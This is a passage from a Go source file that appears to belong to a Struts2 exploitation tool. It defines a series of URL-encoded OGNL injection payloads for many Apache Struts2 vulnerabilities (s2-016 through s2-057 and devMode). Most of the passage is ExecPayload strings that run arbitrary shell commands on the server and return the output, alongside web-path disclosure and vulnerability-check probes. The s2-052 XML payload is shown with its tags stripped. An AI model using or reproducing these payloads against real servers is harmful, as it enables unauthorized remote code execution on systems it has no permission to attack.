"redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27CMD%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27ENCODING%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}" 52 | ) 53 | 54 | // s2-019 55 | var ( 56 | WebPath019 = "%23req%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')%2C%23resp%3D%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse')%2C%23resp.setCharacterEncoding('{encoding}')%2C%23resp.getWriter().println(%23req.getSession().getServletContext().getRealPath('%2F'))%2C%23resp.getWriter().flush()%2C%23resp.getWriter().close()" 57 | ExecPayload019 = 
"%23f%3D%23_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess')%2C%23f.setAccessible(true)%2C%23f.set(%23_memberAccess%2Ctrue)%2C%23req%3D%40org.apache.struts2.ServletActionContext%40getRequest()%2C%23resp%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23a%3D(new%20java.lang.ProcessBuilder(new%20java.lang.String%5B%5D%7B{cmd}%7D)).start()%2C%23b%3D%23a.getInputStream()%2C%23c%3Dnew%20java.io.InputStreamReader(%23b)%2C%23d%3Dnew%20java.io.BufferedReader(%23c)%2C%23e%3Dnew%20char%5B1000%5D%2C%23d.read(%23e)%2C%23resp.println(%23e)%2C%23resp.close()" 58 | ) 59 | 60 | // ExecPayload029 s2-029 61 | var ExecPayload029 = "(%23_memberAccess%5B'allowPrivateAccess'%5D%3Dtrue%2C%23_memberAccess%5B'allowProtectedAccess'%5D%3Dtrue%2C%23_memberAccess%5B'excludedPackageNamePatterns'%5D%3D%23_memberAccess%5B'acceptProperties'%5D%2C%23_memberAccess%5B'excludedClasses'%5D%3D%23_memberAccess%5B'acceptProperties'%5D%2C%23_memberAccess%5B'allowPackageProtectedAccess'%5D%3Dtrue%2C%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue%2C%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream()))" 62 | 63 | // s2-032 64 | var ( 65 | CheckPoc032 = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23context[%23parameters.obj[0]].getWriter().print(%23parameters.content[0]%2b602%2b53718),1?%23xx:%23request.toString&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086" 66 | WebPath032 = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding={encoding}" 67 | ExecPayload032 = 
"method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding={encoding}&cmd={cmd}" 68 | ) 69 | 70 | // s2-033 71 | var ( 72 | CheckPoc033 = "%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]%2b602%2b53718),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=10086" 73 | ExecPayload033 = "%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command={cmd}" 74 | ) 75 | 76 | // s2-037 77 | var ( 78 | WebPath037 = "%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23req.getRealPath(%23parameters.pp%5B0%5D)),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&pp=%2f" 79 | ExecPayload037 = 
"(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command={cmd}" 80 | ) 81 | 82 | // s2-045 83 | var ( 84 | WebPath045 = `%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#outstr=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#outstr.println(#req.getRealPath("/"))).(#outstr.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}` 85 | ExecPayload045 = `%{(#fuck='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='CMD').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new 
java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}` 86 | ) 87 | 88 | // s2-046 89 | var ( 90 | WebPath046 = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#res.getWriter().print('')).(#res.getWriter().print('')).(#res.getWriter().print(#req.getSession().getServletContext().getRealPath('/'))).(#res.getWriter().flush()).(#res.getWriter().close())}\\0b" 91 | CheckPoc046 = "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#res.getWriter().print('security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}\\0b" 92 | ExecPayload046 = 
"%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=ENCODING')).(#s=new java.util.Scanner((new java.lang.ProcessBuilder('CMD'.toString().split('\\\\s'))).start().getInputStream()).useDelimiter('\\\\AAAA')).(#str=#s.hasNext()?#s.next():'').(#res.getWriter().print(#str)).(#res.getWriter().flush()).(#res.getWriter().close()).(#s.close())}\\0b" 93 | ) 94 | 95 | // ExecPayload048 s2-048 96 | var ExecPayload048 = "%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23q%3D%40org.apache.commons.io.IOUtils%40toString(%40java.lang.Runtime%40getRuntime().exec('{cmd}').getInputStream())).(%23q)%7D" 97 | 98 | // ExecPayload052 s2-052 99 | var ExecPayload052 = ` 100 | 101 | 102 | 0 103 | 104 | 105 | 106 | 107 | 108 | false 109 | 0 110 | 111 | 112 | 113 | 114 | 115 | {cmd} 116 | 117 | false 118 | 119 | 120 | 121 | 122 | java.lang.ProcessBuilder 123 | start 124 | 125 | 126 | foo 127 | 128 | foo 129 | 130 | 131 | 132 | 133 | 134 | false 135 | 0 136 | 0 137 | false 138 | 139 | false 140 | 141 | 142 | 143 | 0 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | ` 153 | 154 | // ExecPayload053 s2-053 155 | var ExecPayload053 = 
"%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D'{cmd}').(%23iswin%3D(%40java.lang.System%40getProperty('os.name').toLowerCase().contains('win'))).(%23cmds%3D(%23iswin%3F%7B'cmd.exe'%2C'%2Fc'%2C%23cmd%7D%3A%7B'%2Fbin%2Fbash'%2C'-c'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A" 156 | 157 | // S2-devMode 158 | var ( 159 | WebPathDevMode = "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(%23context%5B%23parameters.reqobj%5B0%5D%5D.getRealPath(%23parameters.pp%5B0%5D))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=Is-Struts2-Vul-URL&pp=%2f&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest" 160 | ExecPayloadDevMode = "?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command={cmd}" 161 | ) 162 | 163 | // S2-057 164 | var ( 165 | ExecPayload057a = 
"%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D" 166 | ExecPayload057b = "%24%7B%28%23_memberAccess%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23w%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D" 167 | ExecPayload057c = "%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23w%3D%23ct.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%29.%28%23w.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29.getInputStream%28%29%29%29%29.%28%23w.close%28%29%29%7D" 168 | ExecPayload057d = 
"%24%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27{cmd}%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D" 169 | ) 170 | --------------------------------------------------------------------------------